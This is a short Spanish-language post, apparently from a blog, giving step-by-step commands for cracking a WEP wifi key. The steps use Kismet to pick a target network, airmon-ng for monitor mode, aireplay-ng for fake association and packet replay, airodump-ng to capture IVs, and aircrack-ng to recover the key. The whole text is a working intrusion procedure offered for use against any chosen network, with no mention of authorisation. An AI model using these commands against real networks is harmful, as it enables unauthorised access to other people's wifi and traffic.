Como romper claves wifi WEP

Estos son los pasos para hacerlo: (Usando wlan0 como interfaz)

1. Instalar Kismet y aircrack-ng; (apt-get install aircrack-ng kismet) definir en su archivo configurable (/etc/kismet.conf)

ncsource=driver,interfaz,nombre_cualquiera

iniciamos kismet (preferiblemente como root) y cuando nos pida la interfaz ponemos la misma del principio (wlan0) y elegimos la red wifi a descifrar, anotando su mac adress, canal que esta usa y el nombre de red y salimos de este para no distorsionar nuestra segunda herramienta

2. Poner la interfaz en modo monitor (promiscuo)

airmon-ng start wlan0 <# de canal>

Nota: el programa nos advertira cerrar otras aplicaciones de ser necesario para que funcione correctamente

Si deseamos detenerlo seria de esta forma:
airmon-ng stop mon0

3. Intentamos asociarnos falsamente al AP

aireplay-ng -1 0 -e 'nombre de la red' -a "Mac Address del Objetivo" -h "TU MAC address de wlan0" interfaz monitor ( seria mon0)

4. Si el paso anterior fue exitoso entonces empezamos la captura de paquetes para luego descifrarlos con dos terminales diferentes

En 1 terminal: aireplay-ng -3 -b "Mac Address Objetivo" -h "Tu MAC address"

En otra: airodump-ng --ivs -w "archivo-nombre" -c "canal" "interfaz monitor"

El dato mas importante es donde dice "DATA" ya que si se mueve muy rapido, mas facil seria descifrar la clave

5. Cuando hayan al menos 15 mil o 20 mil IV's (Initialization Vectors) para 64 bit key pasaremos a descifrarla con aircrack-ng

6. aircrack-ng -a 1 -f 2 {*.ivs,*.cap,*.dump}, con los metacaracteres de esta forma.. capturaremos una cantidad mas grande de IV's por lo que sera mas facil descifrarla

7. Si tiene exito la clave seria asi:

KEY FOUND!! [ AA:BB:CC:DD:EE ] (notese que es en hexadecimal y esta va en el gestor de redes sin los dos puntos (:))

Listo!! Posted by Felipe Mateo